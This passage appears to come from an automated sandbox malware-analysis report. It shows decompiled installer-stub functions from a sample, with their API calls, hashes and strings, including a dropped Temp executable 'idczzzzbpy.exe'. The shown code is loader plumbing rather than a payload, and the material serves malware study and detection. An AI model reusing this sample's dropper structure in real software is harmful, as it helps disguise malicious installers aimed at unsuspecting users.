                    				struct HWND__* _t28;
                    
                    				_t28 = _a4;
                    				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                    				if(_a8 == 0) {
                    					L4:
                    					_v56 = _t15;
                    					_v60 = 4;
                    					SendMessageW(_t28, 0x113e, 0,  &_v60);
                    					return _v24;
                    				}
                    				_t19 = GetMessagePos();
                    				_v16 = _t19 >> 0x10;
                    				_v20 = _t19;
                    				ScreenToClient(_t28,  &_v20);
                    				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                    				if((_v12 & 0x00000066) != 0) {
                    					_t15 = _v8;
                    					goto L4;
                    				}
                    				return _t25 | 0xffffffff;
                    			}















                    APIs
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
                    • GetMessagePos.USER32 ref: 00404FA8
                    • ScreenToClient.USER32 ref: 00404FC2
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Message$Send$ClientScreen
                    • String ID: f
                    • API String ID: 41195575-1993550816
                    • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                    • Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
                    • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                    • Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                    				short _v132;
                    				void* _t11;
                    				WCHAR* _t19;
                    
                    				if(_a8 == 0x110) {
                    					SetTimer(_a4, 1, 0xfa, 0);
                    					_a8 = 0x113;
                    				}
                    				if(_a8 == 0x113) {
                    					_t11 = E00403012();
                    					_t19 = L"unpacking data: %d%%";
                    					if( *0x7a8ab0 == 0) {
                    						_t19 = L"verifying installer: %d%%";
                    					}
                    					wsprintfW( &_v132, _t19, _t11);
                    					SetWindowTextW(_a4,  &_v132);
                    					SetDlgItemTextW(_a4, 0x406,  &_v132);
                    				}
                    				return 0;
                    			}







                    APIs
                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                    • wsprintfW.USER32 ref: 00402FE5
                    • SetWindowTextW.USER32(?,?), ref: 00402FF5
                    • SetDlgItemTextW.USER32 ref: 00403007
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Text$ItemTimerWindowwsprintf
                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                    • API String ID: 1451636040-1158693248
                    • Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                    • Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
                    • Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                    • Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00402950(void* __ebx) {
                    				WCHAR* _t26;
                    				void* _t29;
                    				long _t37;
                    				void* _t49;
                    				void* _t52;
                    				void* _t54;
                    				void* _t56;
                    				void* _t59;
                    				void* _t60;
                    				void* _t61;
                    
                    				_t49 = __ebx;
                    				_t52 = 0xfffffd66;
                    				_t26 = E00402DA6(0xfffffff0);
                    				_t55 = _t26;
                    				 *(_t61 - 0x40) = _t26;
                    				if(E00405FB4(_t26) == 0) {
                    					E00402DA6(0xffffffed);
                    				}
                    				E00406139(_t55);
                    				_t29 = E0040615E(_t55, 0x40000000, 2);
                    				 *(_t61 + 8) = _t29;
                    				if(_t29 != 0xffffffff) {
                    					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                    					if( *(_t61 - 0x28) != _t49) {
                    						_t37 =  *0x7a8ab4;
                    						 *(_t61 - 0x44) = _t37;
                    						_t54 = GlobalAlloc(0x40, _t37);
                    						if(_t54 != _t49) {
                    							E004035FE(_t49);
                    							E004035E8(_t54,  *(_t61 - 0x44));
                    							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                    							 *(_t61 - 0x10) = _t59;
                    							if(_t59 != _t49) {
                    								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                    								while( *_t59 != _t49) {
                    									_t51 =  *_t59;
                    									_t60 = _t59 + 8;
                    									 *(_t61 - 0x3c) =  *_t59;
                    									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                    									_t59 = _t60 +  *(_t61 - 0x3c);
                    								}
                    								GlobalFree( *(_t61 - 0x10));
                    							}
                    							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                    							GlobalFree(_t54);
                    							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                    						}
                    					}
                    					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                    					CloseHandle( *(_t61 + 8));
                    				}
                    				_t56 = 0xfffffff3;
                    				if(_t52 < _t49) {
                    					_t56 = 0xffffffef;
                    					DeleteFileW( *(_t61 - 0x40));
                    					 *((intOrPtr*)(_t61 - 4)) = 1;
                    				}
                    				_push(_t56);
                    				E00401423();
                    				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
                    				return 0;
                    			}














                    APIs
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                    • GlobalFree.KERNEL32 ref: 00402A06
                    • GlobalFree.KERNEL32 ref: 00402A19
                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                    • String ID:
                    • API String ID: 2667972263-0
                    • Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                    • Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
                    • Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                    • Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 48%
                    			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                    				void* _v8;
                    				int _v12;
                    				short _v536;
                    				void* _t27;
                    				signed int _t33;
                    				intOrPtr* _t35;
                    				signed int _t45;
                    				signed int _t46;
                    				signed int _t47;
                    
                    				_t46 = _a12;
                    				_t47 = _t46 & 0x00000300;
                    				_t45 = _t46 & 0x00000001;
                    				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                    				if(_t27 == 0) {
                    					if((_a12 & 0x00000002) == 0) {
                    						L3:
                    						_push(0x105);
                    						_push( &_v536);
                    						_push(0);
                    						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                    							__eflags = _t45;
                    							if(__eflags != 0) {
                    								L10:
                    								RegCloseKey(_v8);
                    								return 0x3eb;
                    							}
                    							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                    							__eflags = _t33;
                    							if(_t33 != 0) {
                    								break;
                    							}
                    							_push(0x105);
                    							_push( &_v536);
                    							_push(_t45);
                    						}
                    						RegCloseKey(_v8);
                    						_t35 = E00406A3B(3);
                    						if(_t35 != 0) {
                    							return  *_t35(_a4, _a8, _t47, 0);
                    						}
                    						return RegDeleteKeyW(_a4, _a8);
                    					}
                    					_v12 = 0;
                    					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                    						goto L10;
                    					}
                    					goto L3;
                    				}
                    				return _t27;
                    			}













                    APIs
                    • RegEnumValueW.ADVAPI32 ref: 00402EFD
                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CloseEnum$DeleteValue
                    • String ID:
                    • API String ID: 1354259210-0
                    • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                    • Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
                    • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                    • Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E00401D81(void* __ebx, void* __edx) {
                    				struct HWND__* _t30;
                    				WCHAR* _t38;
                    				void* _t48;
                    				void* _t53;
                    				signed int _t55;
                    				signed int _t60;
                    				long _t63;
                    				void* _t65;
                    
                    				_t53 = __ebx;
                    				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                    					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                    				} else {
                    					E00402D84(2);
                    					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                    				}
                    				_t55 =  *(_t65 - 0x24);
                    				 *(_t65 + 8) = _t30;
                    				_t60 = _t55 & 0x00000004;
                    				 *(_t65 - 0x38) = _t55 & 0x00000003;
                    				 *(_t65 - 0x18) = _t55 >> 0x1f;
                    				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                    				if((_t55 & 0x00010000) == 0) {
                    					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                    				} else {
                    					_t38 = E00402DA6(0x11);
                    				}
                    				 *(_t65 - 0x44) = _t38;
                    				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                    				asm("sbb esi, esi");
                    				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                    				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                    				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                    					DeleteObject(_t48);
                    				}
                    				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                    					_push(_t63);
                    					E004065B5();
                    				}
                    				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
                    				return 0;
                    			}












                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                    • String ID:
                    • API String ID: 1849352358-0
                    • Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                    • Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
                    • Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                    • Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E00401E4E(intOrPtr __edx) {
                    				void* __edi;
                    				int _t9;
                    				signed char _t15;
                    				struct HFONT__* _t18;
                    				intOrPtr _t30;
                    				void* _t31;
                    				struct HDC__* _t33;
                    				void* _t35;
                    
                    				_t30 = __edx;
                    				_t33 = GetDC( *(_t35 - 8));
                    				_t9 = E00402D84(2);
                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                    				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                    				ReleaseDC( *(_t35 - 8), _t33);
                    				 *0x40ce08 = E00402D84(3);
                    				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                    				 *0x40ce0f = 1;
                    				 *0x40ce0c = _t15 & 0x00000001;
                    				 *0x40ce0d = _t15 & 0x00000002;
                    				 *0x40ce0e = _t15 & 0x00000004;
                    				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                    				_t18 = CreateFontIndirectW(0x40cdf8);
                    				_push(_t18);
                    				_push(_t31);
                    				E004065B5();
                    				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
                    				return 0;
                    			}












                    APIs
                    • GetDC.USER32(?), ref: 00401E51
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                    • ReleaseDC.USER32 ref: 00401E84
                      • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                      • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                    • String ID:
                    • API String ID: 2584051700-0
                    • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                    • Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
                    • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                    • Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E00401C43(intOrPtr __edx) {
                    				int _t29;
                    				long _t30;
                    				signed int _t32;
                    				WCHAR* _t35;
                    				long _t36;
                    				int _t41;
                    				signed int _t42;
                    				int _t46;
                    				int _t56;
                    				intOrPtr _t57;
                    				struct HWND__* _t63;
                    				void* _t64;
                    
                    				_t57 = __edx;
                    				_t29 = E00402D84(3);
                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    				 *(_t64 - 0x18) = _t29;
                    				_t30 = E00402D84(4);
                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    				 *(_t64 + 8) = _t30;
                    				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                    					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                    				}
                    				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                    				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                    					 *(_t64 + 8) = E00402DA6(0x44);
                    				}
                    				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                    				_push(1);
                    				if(__eflags != 0) {
                    					_t61 = E00402DA6();
                    					_t32 = E00402DA6();
                    					asm("sbb ecx, ecx");
                    					asm("sbb eax, eax");
                    					_t35 =  ~( *_t31) & _t61;
                    					__eflags = _t35;
                    					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                    					goto L10;
                    				} else {
                    					_t63 = E00402D84();
                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    					_t41 = E00402D84(2);
                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    					_t56 =  *(_t64 - 0x1c) >> 2;
                    					if(__eflags == 0) {
                    						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                    						L10:
                    						 *(_t64 - 0x38) = _t36;
                    					} else {
                    						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                    						asm("sbb eax, eax");
                    						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                    					}
                    				}
                    				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                    				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                    					_push( *(_t64 - 0x38));
                    					E004065B5();
                    				}
                    				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
                    				return 0;
                    			}
















                    APIs
                    • SendMessageTimeoutW.USER32 ref: 00401CB3
                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend$Timeout
                    • String ID: !
                    • API String ID: 1777923405-2657877971
                    • Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                    • Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
                    • Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                    • Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                    				char _v68;
                    				char _v132;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t23;
                    				signed int _t24;
                    				void* _t31;
                    				void* _t33;
                    				void* _t34;
                    				void* _t44;
                    				signed int _t46;
                    				signed int _t50;
                    				signed int _t52;
                    				signed int _t53;
                    				signed int _t55;
                    
                    				_t23 = _a16;
                    				_t53 = _a12;
                    				_t44 = 0xffffffdc;
                    				if(_t23 == 0) {
                    					_push(0x14);
                    					_pop(0);
                    					_t24 = _t53;
                    					if(_t53 < 0x100000) {
                    						_push(0xa);
                    						_pop(0);
                    						_t44 = 0xffffffdd;
                    					}
                    					if(_t53 < 0x400) {
                    						_t44 = 0xffffffde;
                    					}
                    					if(_t53 < 0xffff3333) {
                    						_t52 = 0x14;
                    						asm("cdq");
                    						_t24 = 1 / _t52 + _t53;
                    					}
                    					_t25 = _t24 & 0x00ffffff;
                    					_t55 = _t24 >> 0;
                    					_t46 = 0xa;
                    					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                    				} else {
                    					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                    					_t50 = 0;
                    				}
                    				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                    				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
                    				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
                    				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                    				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
                    			}




















                    APIs
                    • lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                    • wsprintfW.USER32 ref: 00404F21
                    • SetDlgItemTextW.USER32 ref: 00404F34
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: ItemTextlstrlenwsprintf
                    • String ID: %u.%u%s%s
                    • API String ID: 3540041739-3551169577
                    • Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                    • Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
                    • Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                    • Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E00405F3D(WCHAR* _a4) {
                    				WCHAR* _t9;
                    
                    				_t9 = _a4;
                    				_push( &(_t9[lstrlenW(_t9)]));
                    				_push(_t9);
                    				if( *(CharPrevW()) != 0x5c) {
                    					lstrcatW(_t9, 0x40a014);
                    				}
                    				return _t9;
                    			}





                    APIs
                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F4D
                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405F5F
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CharPrevlstrcatlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 2659869361-3916508600
                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                    • Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                    • Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                    				int _t15;
                    				long _t16;
                    
                    				_t15 = _a8;
                    				if(_t15 != 0x102) {
                    					if(_t15 != 0x200) {
                    						_t16 = _a16;
                    						L7:
                    						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
                    							_push(_t16);
                    							_push(6);
                    							 *0x7a1f74 = _t16;
                    							E00405005();
                    						}
                    						L11:
                    						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
                    					}
                    					if(IsWindowVisible(_a4) == 0) {
                    						L10:
                    						_t16 = _a16;
                    						goto L11;
                    					}
                    					_t16 = E00404F85(_a4, 1);
                    					_t15 = 0x419;
                    					goto L7;
                    				}
                    				if(_a12 != 0x20) {
                    					goto L10;
                    				}
                    				E00404616(0x413);
                    				return 0;
                    			}






                    APIs
                    • IsWindowVisible.USER32(?), ref: 00405673
                    • CallWindowProcW.USER32(?,?,?,?), ref: 004056C4
                      • Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Window$CallMessageProcSendVisible
                    • String ID:
                    • API String ID: 3748168415-3916222277
                    • Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                    • Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
                    • Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                    • Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                    				int _v8;
                    				long _t21;
                    				long _t24;
                    				char* _t30;
                    
                    				asm("sbb eax, eax");
                    				_v8 = 0x800;
                    				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                    				_t30 = _a16;
                    				if(_t21 != 0) {
                    					L4:
                    					 *_t30 =  *_t30 & 0x00000000;
                    				} else {
                    					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                    					_t21 = RegCloseKey(_a20);
                    					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                    					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                    						goto L4;
                    					}
                    				}
                    				return _t21;
                    			}








                    APIs
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F68,00000000,?,?,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,?,?,004067A3,80000002), ref: 00406582
                    • RegCloseKey.ADVAPI32(?,?,004067A3,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,007A0F68), ref: 0040658D
                    Strings
                    • C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk, xrefs: 00406543
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CloseQueryValue
                    • String ID: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                    • API String ID: 3356406503-2769139442
                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                    • Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                    • Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
                    				int _v8;
                    				int _t12;
                    				int _t14;
                    				int _t15;
                    				CHAR* _t17;
                    				CHAR* _t27;
                    
                    				_t12 = lstrlenA(_a8);
                    				_t27 = _a4;
                    				_v8 = _t12;
                    				while(lstrlenA(_t27) >= _v8) {
                    					_t14 = _v8;
                    					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                    					_t15 = lstrcmpiA(_t27, _a8);
